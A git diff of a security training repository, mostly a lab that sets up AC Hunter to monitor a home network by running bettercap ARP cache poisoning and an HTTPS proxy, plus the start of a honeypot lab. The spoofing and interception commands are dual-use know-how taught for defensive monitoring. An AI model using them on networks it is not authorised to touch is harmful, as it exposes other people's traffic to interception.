diff --git a/DeepBlueCLI-master.zip b/DeepBlueCLI-master.zip
deleted file mode 100644
index a10620eb..00000000
Binary files a/DeepBlueCLI-master.zip and /dev/null differ
diff --git a/IntroClassFiles/BHIS_Tribe_of_companies_wallpaper_01.png b/IntroClassFiles/BHIS_Tribe_of_companies_wallpaper_01.png
deleted file mode 100644
index 3a38fd5a..00000000
Binary files a/IntroClassFiles/BHIS_Tribe_of_companies_wallpaper_01.png and /dev/null differ
diff --git a/IntroClassFiles/GraphRunner_Outputs (1).zip b/IntroClassFiles/GraphRunner_Outputs (1).zip
deleted file mode 100644
index 0c0aa037..00000000
Binary files a/IntroClassFiles/GraphRunner_Outputs (1).zip and /dev/null differ
diff --git a/IntroClassFiles/SampleReports (1).zip b/IntroClassFiles/SampleReports (1).zip
deleted file mode 100644
index a0d0bab2..00000000
Binary files a/IntroClassFiles/SampleReports (1).zip and /dev/null differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCE/ACHunterCE.md b/IntroClassFiles/Tools/IntroClass/ACHCE/ACHunterCE.md
index 047fad1b..f1ae33ef 100644
--- a/IntroClassFiles/Tools/IntroClass/ACHCE/ACHunterCE.md
+++ b/IntroClassFiles/Tools/IntroClass/ACHCE/ACHunterCE.md
@@ -1,52 +1,54 @@
 ![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
 
+# Overview + Setup
 
 In this lab we are going to set up the Community Edition of AC Hunter so it can intercept and inspect traffic on a home network without the need for expensive managed switches with SPAN or TAP ports.  This is done through the amazing power of ARP cache poisoning.
 
-Step 0, Download AC Hunter Community Edition Here:
-
-https://www.activecountermeasures.com/ac-hunter-community-edition/download/
+- Download AC Hunter Community Edition [Here](https://www.activecountermeasures.com/ac-hunter-community-edition/download/)
 
 ![](attachments/ACHCE_Download.png)
 
 ![](attachments/ClickDownload.png)
 
------------------------------------------
-This next section will walk through how to launch the AC Hunter VM using VMware.
+----------------------------------------- 
+
+<br><br>
+
+This next section will walk through how to launch the **AC Hunter VM** using **VMware**.
 
-Start by opening file explorer and navigating to your downloads directory.
+- Start by opening **file explorer** and navigating to your downloads directory.
 
 ![](attachments/OpeningFileExplorer.png)
 
 ![](attachments/navigatetodownloads.png)
 
-You should see the AC Hunter .zip archive that we just downloaded. We need to extract this. Click on the .zip archive and hit `Extract all` at the top of the screen.
+- You should see the `AC-Hunter.zip` archive that we just downloaded. We need to extract this. Click on the `.zip` archive and hit `Extract all` at the top of the screen.
 
 ![](attachments/extractall.png)
 
-When the pop-up appears, click extract. This will extract the .zip archive to the downloads folder. 
+- When the pop-up appears, click **extract**. This will extract the `.zip` archive to the downloads folder. 
 
 ![](attachments/extract.png)
 
-Next, open your VMware application. In this instance, we use VMware Workstation. Once opened, first make sure you have the home tab selected. Then, click `Open a Virtual Machine`.
+- Next, open your VMware application. In this instance, we use **VMware Workstation**. Once opened, first make sure you have the home tab selected. Then, click `Open a Virtual Machine`.
 
 ![](attachments/openvmware.png)
 
-Once again, navigate to your downloads folder, and then into the extracted `AC-Hunter-v...` folder. If done correctly, you should only see one file that can be selected. Go ahead and double click on it.
+- Once again, navigate to your downloads folder, and then into the extracted `AC-Hunter-v...` folder. If done correctly, you should only see one file that can be selected. Go ahead and double click on it.
 
 ![](attachments/openfolder.png)
 
 ![](attachments/doubleclick.png)
 
-After doing this, you should see a new tab appear shown in the screenshot below.
+- After doing this, you should see a new tab appear shown in the screenshot below.
 
 ![](attachments/newtab.png)
 
 --------------------------------------------
 
-Now that we have successfully loaded the AC Hunter VM into our VMware application, we need to do two things.
+Now that we have successfully loaded the **AC Hunter VM** into our VMware application, we need to change the network settings.
 
-1. The first thing we will need to do is to change VM to Bridged networking from NAT.  This can be done in the settings for the VM which can be accessed via VM > Settings > Network Adapter 
+- What we will need to do is to change **VM** to `Bridged networking` from **NAT**.  This can be done in the settings for the VM which can be accessed via `VM` > `Settings` > `Network Adapter` 
 
 ![](attachments/editsettings.png)
 
@@ -54,44 +56,66 @@ Now that we have successfully loaded the AC Hunter VM into our VMware applicatio
 
 ![](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/ACHCE/VMWare_Bridge.png)
 
-2. Go ahead and hit `Power on this virtual machine`.
- When the VM is done booting it is essential you copy password before login!!!! It is displayed in the logon banner at first boot and will go away once it is used.
+- Go ahead and hit `Power on this virtual machine`.
 
+>[!IMPORTANT]
+> When the VM is done booting it is essential you **copy password** before login!!!! It is displayed in the logon banner at **first boot** and will go away once it is used.
+>
+> **User ID** is `dataimport`	
 
-User ID is dataimport	
-
-5. Change the default password after initial login by running the following:
-<pre>passwd</pre>
+- Change the **default password** after initial login by running the following:
+```bash
+passwd
+```
 
-6. Next, get your IP Address by running the following command:
+- Next, get your **IP Address** by running the following command:
 
-<pre>ip addr show dev ens33 | grep inet </pre>
+```bash
+ip addr show dev ens33 | grep inet
+```
 
 ![](attachments/IP.png)
 
-5. Now lets open Terminal on Windows and open two SSH sessions.  I like to have one as root and another as dataimport for the install.
+- Now lets open Terminal on Windows and open two **SSH sessions**. I like to have one as **root** and another as **dataimport** for the install.
+
+<br>
 
 From Windows Terminal.
 
-Terminal 1:
+- **Terminal 1:**
+
+```bash
+ssh dataimport@YourACHCE_IPADDRESS
+```
 
-<pre>ssh dataimport@YourACHCE_IPADDRESS</pre>
+- **Terminal 2:**
 
-Terminal 2:
+```bash
+ssh dataimport@YOURACHCE_IPADDRESS
+```
 
-`ssh dataimport@YOURACHCE_IPADDRESS`
+```bash
+sudo su -
+```
 
-`sudo su -`
+<br>
 
-6. As dataimport, pull down and install zeek
+- As **dataimport**, pull down and install **zeek**
 
-`sudo wget -O /usr/local/bin/zeek https://raw.githubusercontent.com/activecm/docker-zeek/master/zeek`
+```bash
+sudo wget -O /usr/local/bin/zeek https://raw.githubusercontent.com/activecm/docker-zeek/master/zeek
+```
 
-`sudo chmod +x /usr/local/bin/zeek`
+```bash
+sudo chmod +x /usr/local/bin/zeek
+```
 
-`zeek pull`
+```bash
+zeek pull
+```
 
-7. Choose your ens adaptor!!
+>[!IMPORTANT]
+> Choose your **ens adaptor**!!
 
 It should look like it does below:
 
@@ -109,15 +133,22 @@ It should look like it does below:
  
  ```
 
-`zeek start`
+- Start **zeek**
+```bash
+zeek start
+```
 
-8. Add a password for the web user for AC Hunter
+- Add a password for the web user for AC Hunter
 
-`manage_web_user.sh reset -u 'welcome@activecountermeasures.com'`
+```bash
+manage_web_user.sh reset -u 'welcome@activecountermeasures.com'
+```
 
 It should look like it does below:
 
-```dataimport@achce:~$ manage_web_user.sh reset -u 'welcome@activecountermeasures.com'
+```
+dataimport@achce:~$ manage_web_user.sh reset -u 'welcome@activecountermeasures.com'
+
 Please enter a password
 Please re-enter to confirm:
 achunter_db is up-to-date
@@ -134,23 +165,34 @@ dataimport@achce:~$
 
 9. Get the proper scripts to connect the Zeek Sensor
 
-`curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/connect_sensor.sh -O`
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/connect_sensor.sh -O
+```
 
-`curl -fsSL https://raw.githubusercontent.com/activecm/shell-lib/master/acmlib.sh -O`
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/shell-lib/master/acmlib.sh -O
+```
 
-`curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/zeek_log_transport.sh -O`
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/zeek_log_transport.sh -O
+```
 
-10. Get your hostname
+- Get your **hostname**
 
-`hostname`
+```bash
+hostname
+```
 
-11. run the script with your ac-hunter system hostname:
+- Run the script with your **ac-hunter** system **hostname**:
 
-`bash connect_sensor.sh achce`
+```bash
+bash connect_sensor.sh achce
+```
 
 It should look like it does below:
 
-```================ Creating a new RSA key with no passphrase ================
+```
+================ Creating a new RSA key with no passphrase ================
 Generating public/private rsa key pair.
 Your identification has been saved in /home/dataimport/.ssh/id_rsa_dataimport
 Your public key has been saved in /home/dataimport/.ssh/id_rsa_dataimport.pub
@@ -178,35 +220,54 @@ dataimport@achce's password:
 
 ```
 
-12. Install bettercap as root!!! Please switch to the other Terminal where you are running as root.
+- Install **bettercap** as **root**!!! Please switch to the other Terminal where you are running as root.
 
-`docker pull bettercap/bettercap`
+>[!IMPORTANT]
+> Make sure you are in the right **terminal**
 
-`docker run -it --privileged --net=host bettercap/bettercap -eval "caplets.update; ui.update; q"`
+```bash
+docker pull bettercap/bettercap
+```
+
+```bash
+docker run -it --privileged --net=host bettercap/bettercap -eval "caplets.update; ui.update; q"
+```
 
-13. Install mlocate
+- Install **mlocate**
 
-`apt install mlocate`
+>[!NOTE]
+> From the **kali** terminal
 
-14. Updated the database
+```bash
+apt install mlocate
+```
+
+- Updated the **database**
 
-`updatedb`
+```bash
+updatedb
+```
 
-15. Search for the config files
+- Search for the **config files**
 
-`locate https-ui.cap`
+```bash
+locate https-ui.cap
+```
 
-16. Edit the https-ui.cap file:
+- Edit the `https-ui.cap` file:
 
 Please note your path will be different!!!!!
 
-`vi /var/lib/docker/overlay2/5146307503ac713827d090d51b88a622af068579060d8e1f1d97cda56415e018/diff/app/https-ui.cap`
+```bash
+vi /var/lib/docker/overlay2/5146307503ac713827d090d51b88a622af068579060d8e1f1d97cda56415e018/diff/app/https-ui.cap
+```
 
-Change the line set https.server.port to 4443
+- Change the line set `https.server.port` to **4443**
 
 It should look like it does below:
 
-```# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0
+```
+# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0
 set api.rest.address 0.0.0.0
 set api.rest.port 8083
 set https.server.address 0.0.0.0
@@ -230,19 +291,21 @@ https.server on
 ```
 
 
-log out of vi with esc :wq!
+- Log out of vi with by pressing `esc` and **typing** `:wq!` and pressing `Enter`
 
-###Please note, there seems to be a weird bug in Bettercap where it updates the port to 4444443.  If you get a bind error, just re-edit the above file to set the port to 443.
+### Please note, there seems to be a weird bug in Bettercap where it updates the port to 4444443.  If you get a bind error, just re-edit the above file to set the port to 443.
 
-17. Start bettercap
-
-
-`docker run -it --privileged --net=host bettercap/bettercap -caplet https-ui`
+- Start **bettercap**
 
+```bash
+docker run -it --privileged --net=host bettercap/bettercap -caplet https-ui
+```
 
-18. Show the network
+- Show the **network**
 
-`net.show`
+```bash
+net.show
+```
 
 
 ```
@@ -263,9 +326,11 @@ log out of vi with esc :wq!
 
 ```
 
-19. Show help for options!
+- Show **help** for **options**!
 
-`help`
+```bash
+help
+```
 
 It should look like it does below:
 
@@ -323,17 +388,35 @@ Modules
 			
 ```
 
-20.  Start the poison
+-  Start the **poison**
+
+```bash
+arp.spoof on
+```
+
+- Start the https proxy
+
+```bash
+https.proxy on
+```
+
+Now, surf to your **AC-Hunter system**!!!
+
+`https://<YOUR_ACHCE_IP_ADDR>`
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](https://github.com/strandjs/IntroLabs/tree/master/IntroClassFiles/Tools/IntroClass/PoisoningtheWellIR-main)</i></b>
 
-`arp.spoof on`
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/FirewallLog/FirewallLog.md)</i></b>
 
-21. Start the https proxy
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
-`https.proxy on`
+***Finished with the Labs?***
 
-Now, surf to your AC-Hunter system!!!
+Please be sure to destroy the lab environment!
 
-https://<YOUR_ACHCE_IP_ADDR>
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
+---
 
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/ACHunterCE.md b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/ACHunterCE.md
new file mode 100644
index 00000000..02cfcbbe
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/ACHunterCE.md
@@ -0,0 +1,423 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Overview + Setup
+
+In this lab we are going to set up the Community Edition of AC Hunter so it can intercept and inspect traffic on a home network without the need for expensive managed switches with SPAN or TAP ports.  This is done through the amazing power of ARP cache poisoning.
+
+- Download AC Hunter Community Edition [Here](https://www.activecountermeasures.com/ac-hunter-community-edition/download/)
+
+![](attachments/ACHCE_Download.png)
+
+![](attachments/ClickDownload.png)
+
+----------------------------------------- 
+
+<br><br>
+
+This next section will walk through how to launch the **AC Hunter VM** using **VMware**.
+
+- Start by opening **file explorer** and navigating to your downloads directory.
+
+<img width="534" height="48" alt="OpenFileExplorer" src="https://github.com/user-attachments/assets/76e4cb56-e92f-43b7-9f45-677fb0eccf93" />
+
+
+![](attachments/navigatetodownloads.png)
+
+- You should see the `AC-Hunter.zip` archive that we just downloaded. We need to extract this. Click on the `.zip` archive and hit `Extract all` at the top of the screen.
+
+![](attachments/extractall.png)
+
+- When the pop-up appears, click **extract**. This will extract the `.zip` archive to the downloads folder. 
+
+![](attachments/extract.png)
+
+- Next, open your VMware application. In this instance, we use **VMware Workstation**. Once opened, first make sure you have the home tab selected. Then, click `Open a Virtual Machine`.
+
+![](attachments/openvmware.png)
+
+- Once again, navigate to your downloads folder, and then into the extracted `AC-Hunter-v...` folder. If done correctly, you should only see one file that can be selected. Go ahead and double click on it.
+
+![](attachments/openfolder.png)
+
+![](attachments/doubleclick.png)
+
+- After doing this, you should see a new tab appear shown in the screenshot below.
+
+![](attachments/newtab.png)
+
+--------------------------------------------
+
+Now that we have successfully loaded the **AC Hunter VM** into our VMware application, we need to change the network settings.
+
+- What we will need to do is to change **VM** to `Bridged networking` from **NAT**.  This can be done in the settings for the VM which can be accessed via `VM` > `Settings` > `Network Adapter` 
+
+![](attachments/editsettings.png)
+
+![](attachments/networkadapter.png)
+
+![](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/ACHCE/VMWare_Bridge.png)
+
+- Go ahead and hit `Power on this virtual machine`.
+
+>[!IMPORTANT]
+> When the VM is done booting it is essential you **copy password** before login!!!! It is displayed in the logon banner at **first boot** and will go away once it is used.
+>
+> **User ID** is `dataimport`	
+
+- Change the **default password** after initial login by running the following:
+```bash
+passwd
+```
+
+- Next, get your **IP Address** by running the following command:
+
+```bash
+ip addr show dev ens33 | grep inet
+```
+
+![](attachments/IP.png)
+
+- Now lets open Terminal on Windows and open two **SSH sessions**. I like to have one as **root** and another as **dataimport** for the install.
+
+<br>
+
+From Windows Terminal.
+
+- **Terminal 1:**
+
+```bash
+ssh dataimport@YourACHCE_IPADDRESS
+```
+
+- **Terminal 2:**
+
+```bash
+ssh dataimport@YOURACHCE_IPADDRESS
+```
+
+```bash
+sudo su -
+```
+
+<br>
+
+- As **dataimport**, pull down and install **zeek**
+
+```bash
+sudo wget -O /usr/local/bin/zeek https://raw.githubusercontent.com/activecm/docker-zeek/master/zeek
+```
+
+```bash
+sudo chmod +x /usr/local/bin/zeek
+```
+
+```bash
+zeek pull
+```
+
+>[!IMPORTANT]
+> Choose your **ens adaptor**!!
+
+It should look like it does below:
+
+```
+? Choose your capture interface(s):  [Use arrows to move, space to select, type to filter, ? for more help]
+  [ ]  br-d933eaf5d433      UP      172.18.0.1  fe80::42:4cff:fea7:3586
+  [ ]  docker0              UP      172.17.0.1
+> [ ]  ens33                UP   192.168.3.122  fe80::20c:29ff:fec7:4f8
+  [ ]  lo                   UP       127.0.0.1  ::1
+  [ ]  veth07f3680          UP               -  fe80::6c66:1dff:fe22:2de5
+  [ ]  veth6f1a6c9          UP               -  fe80::5428:54ff:fe62:b8a0
+  [ ]  veth99c741a          UP               -  fe80::1ccd:2aff:fee8:fa3e
+  [ ]  vethb857d1b          UP               -  fe80::60d4:3ff:fe88:9500
+  [ ]  vethed90b7f          UP               -  fe80::44ef:6fff:fe64:1c26
+ 
+ ```
+
+- Start **zeek**
+```bash
+zeek start
+```
+
+- Add a password for the web user for AC Hunter
+
+```bash
+manage_web_user.sh reset -u 'welcome@activecountermeasures.com'
+```
+
+It should look like it does below:
+
+```
+dataimport@achce:~$ manage_web_user.sh reset -u 'welcome@activecountermeasures.com'
+
+Please enter a password
+Please re-enter to confirm:
+achunter_db is up-to-date
+MongoDB shell version v4.2.23
+connecting to: mongodb://127.0.0.1:27017/users?authSource=admin&compressors=disabled&gssapiServiceName=mongodb
+Implicit session: session { "id" : UUID("72e4d3b5-350b-489d-ae29-1f10660648ce") }
+MongoDB server version: 4.2.23
+WriteResult({ "nRemoved" : 1 })
+Creating achunter_auth_run ... done
+User created successfully.
+{'email': 'welcome@activecountermeasures.com', 'password': '****', 'active': True}
+dataimport@achce:~$
+```
+
+9. Get the proper scripts to connect the Zeek Sensor
+
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/connect_sensor.sh -O
+```
+
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/shell-lib/master/acmlib.sh -O
+```
+
+```bash
+curl -fsSL https://raw.githubusercontent.com/activecm/zeek-log-transport/master/zeek_log_transport.sh -O
+```
+
+- Get your **hostname**
+
+```bash
+hostname
+```
+
+- Run the script with your **ac-hunter** system **hostname**:
+
+```bash
+bash connect_sensor.sh achce
+```
+
+It should look like it does below:
+
+```
+================ Creating a new RSA key with no passphrase ================
+Generating public/private rsa key pair.
+Your identification has been saved in /home/dataimport/.ssh/id_rsa_dataimport
+Your public key has been saved in /home/dataimport/.ssh/id_rsa_dataimport.pub
+The key fingerprint is:
+SHA256:oKsPovlMN0mYiwA7Q4ap/tSKawXdvU94HdhOqs+KR08 dataimport@achce
+The key's randomart image is:
++---[RSA 2048]----+
+|                 |
+|..               |
+|+o. . o   o      |
+|=o + o o . +     |
+|* + o   S = .    |
+|o+ +.o + E o     |
+|o.=.=.. B        |
+|.*++...o.o       |
+|++=+....oo       |
++----[SHA256]-----+
+
+================ Transferring the RSA key to dataimport@achce - please provide the password when prompted.  You may be prompted to accept the ssh host key. ================
+The authenticity of host 'achce (127.0.1.1)' can't be established.
+ECDSA key fingerprint is SHA256:gh75DHZlG9aFp3JHgD6be74O6jH2ueASZX3aLcE7STg.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added 'achce' (ECDSA) to the list of known hosts.
+dataimport@achce's password:
+
+```
+
+- Install **bettercap** as **root**!!! Please switch to the other Terminal where you are running as root.
+
+>[!IMPORTANT]
+> Make sure you are in the right **terminal**
+
+```bash
+docker pull bettercap/bettercap
+```
+
+```bash
+docker run -it --privileged --net=host bettercap/bettercap -eval "caplets.update; ui.update; q"
+```
+
+- Install **mlocate**
+
+>[!NOTE]
+> From the **kali** terminal
+
+```bash
+apt install mlocate
+```
+
+- Updated the **database**
+
+```bash
+updatedb
+```
+
+- Search for the **config files**
+
+```bash
+locate https-ui.cap
+```
+
+- Edit the `https-ui.cap` file:
+
+Please note your path will be different!!!!!
+
+```bash
+vi /var/lib/docker/overlay2/5146307503ac713827d090d51b88a622af068579060d8e1f1d97cda56415e018/diff/app/https-ui.cap
+```
+
+- Change the line set `https.server.port` to **4443**
+
+It should look like it does below:
+
+```
+# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0
+set api.rest.address 0.0.0.0
+set api.rest.port 8083
+set https.server.address 0.0.0.0
+set https.server.port 4443
+
+# make sure both use the same https certificate so api requests won't fail
+set https.server.certificate ~/.bettercap-https.cert.pem
+set https.server.key ~/.bettercap-https.key.pem
+set api.rest.certificate ~/.bettercap-https.cert.pem
+set api.rest.key ~/.bettercap-https.key.pem
+# default installation path of the ui
+set https.server.path /usr/local/share/bettercap/ui
+
+# !!! CHANGE THESE !!!
+set api.rest.username user
+set api.rest.password pass
+
+# go!
+api.rest on
+https.server on
+```
+
+
+- Log out of vi with by pressing `esc` and **typing** `:wq!` and pressing `Enter`
+
+### Please note, there seems to be a weird bug in Bettercap where it updates the port to 4444443.  If you get a bind error, just re-edit the above file to set the port to 443.
+
+- Start **bettercap**
+
+```bash
+docker run -it --privileged --net=host bettercap/bettercap -caplet https-ui
+```
+
+- Show the **network**
+
+```bash
+net.show
+```
+
+
+```
+
+192.168.3.0/24 > 192.168.3.116  » net.show
+
+┌───────────────┬───────────────────┬─────────────────┬───────────────────────┬────────┬────────┬──────────┐
+│     IP ▴      │        MAC        │      Name       │        Vendor         │  Sent  │ Recvd  │   Seen   │
+├───────────────┼───────────────────┼─────────────────┼───────────────────────┼────────┼────────┼──────────┤
+│ 192.168.3.116 │ 00:0c:29:8e:f6:79 │ ens33           │ VMware, Inc.          │ 0 B    │ 0 B    │ 15:25:44 │
+│ 192.168.3.1   │ a0:21:b7:7b:0f:59 │ gateway         │ Netgear               │ 11 kB  │ 45 kB  │ 15:25:44 │
+│               │                   │                 │                       │        │        │          │
+│ 192.168.3.132 │ f0:2f:74:d0:e7:e8 │ DESKTOP-92LVFPS │ ASUSTek COMPUTER INC. │ 364 kB │ 587 kB │ 15:29:25 │
+└───────────────┴───────────────────┴─────────────────┴───────────────────────┴────────┴────────┴──────────┘
+
+↑ 6.7 kB / ↓ 962 kB / 3748 pkts
+
+
+```
+
+- Show **help** for **options**!
+
+```bash
+help
+```
+
+It should look like it does below:
+
+```
+
+192.168.3.0/24 > 192.168.3.116  » help
+
+           help MODULE : List available commands or show module specific help if no module name is provided.
+                active : Show information about active modules.
+                  quit : Close the session and exit.
+         sleep SECONDS : Sleep for the given amount of seconds.
+              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
+        set NAME VALUE : Set the VALUE of variable NAME.
+  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
+                 clear : Clear the screen.
+        include CAPLET : Load and run this caplet in the current session.
+             ! COMMAND : Execute a shell command and print its output.
+        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
+
+Modules
+
+      any.proxy > not running
+       api.rest > running
+      arp.spoof > running
+      ble.recon > not running
+             c2 > not running
+        caplets > not running
+    dhcp6.spoof > not running
+      dns.spoof > not running
+  events.stream > running
+            gps > not running
+            hid > not running
+     http.proxy > not running
+    http.server > not running
+    https.proxy > not running
+   https.server > running
+    mac.changer > not running
+    mdns.server > not running
+   mysql.server > not running
+      ndp.spoof > not running
+      net.probe > not running
+      net.recon > running
+      net.sniff > not running
+   packet.proxy > not running
+       syn.scan > not running
+      tcp.proxy > not running
+         ticker > not running
+             ui > not running
+         update > not running
+           wifi > not running
+            wol > not running
+			
+			
+			
+			
+```
+
+-  Start the **poison**
+
+```bash
+arp.spoof on
+```
+
+- Start the https proxy
+
+```bash
+https.proxy on
+```
+
+Now, surf to your **AC-Hunter system**!!!
+
+`https://<YOUR_ACHCE_IP_ADDR>`
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/IntroClass/PingCastle.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/WebTestingIntroClass/WebTesting.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ACHCE_Download.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ACHCE_Download.png
new file mode 100644
index 00000000..5d09bfb3
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ACHCE_Download.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ClickDownload.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ClickDownload.png
new file mode 100644
index 00000000..4e0c3a72
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ClickDownload.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/IP.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/IP.png
new file mode 100644
index 00000000..7afa7c14
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/IP.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ImagesHere b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ImagesHere
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/ImagesHere
@@ -0,0 +1 @@
+
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/OpeningFileExplorer.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/OpeningFileExplorer.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/md/images/OpeningFileExplorer.png
rename to IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/OpeningFileExplorer.png
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/Password2.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/Password2.png
new file mode 100644
index 00000000..16f649f8
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/Password2.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/VMWare_Bridge.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/VMWare_Bridge.png
new file mode 100644
index 00000000..75d64bd9
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/VMWare_Bridge.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/doubleclick.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/doubleclick.png
new file mode 100644
index 00000000..2078e4c0
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/doubleclick.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/editsettings.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/editsettings.png
new file mode 100644
index 00000000..bd8d1f15
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/editsettings.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extract.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extract.png
new file mode 100644
index 00000000..3b2d6fa9
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extract.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extractall.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extractall.png
new file mode 100644
index 00000000..b31f2d0f
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/extractall.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/navigatetodownloads.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/navigatetodownloads.png
new file mode 100644
index 00000000..e2c3fe32
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/navigatetodownloads.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/networkadapter.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/networkadapter.png
new file mode 100644
index 00000000..a826a01e
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/networkadapter.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/newtab.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/newtab.png
new file mode 100644
index 00000000..e9fcca15
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/newtab.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openfolder.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openfolder.png
new file mode 100644
index 00000000..5590d230
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openfolder.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openvmware.png b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openvmware.png
new file mode 100644
index 00000000..77312fc6
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ACHCEIntroClass/attachments/openvmware.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Beelzebub.md b/IntroClassFiles/Tools/IntroClass/ADHD/Beelzebub.md
new file mode 100644
index 00000000..5f12bd3a
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Beelzebub.md
@@ -0,0 +1,120 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Beelzebub
+
+# Ubuntu VM
+
+Beelzebub is an advanced honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks. It offers a low code approach for easy implementation and uses AI to mimic the behavior of a high-interaction honeypot
+
+>[!IMPORTANT]
+>
+>You can find the original GitHub of at [Beelzebub Repo](https://github.com/mariocandela/beelzebub)
+
+### Get the ChatGPT Api Key
